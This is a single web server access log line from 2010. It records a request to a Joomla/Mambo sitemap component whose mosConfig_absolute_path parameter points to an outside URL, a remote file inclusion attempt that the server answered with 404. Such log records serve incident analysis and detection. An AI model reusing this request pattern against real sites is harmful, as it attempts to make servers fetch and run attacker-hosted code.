88.191.94.188 - - [03/Mar/2010:04:50:19 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
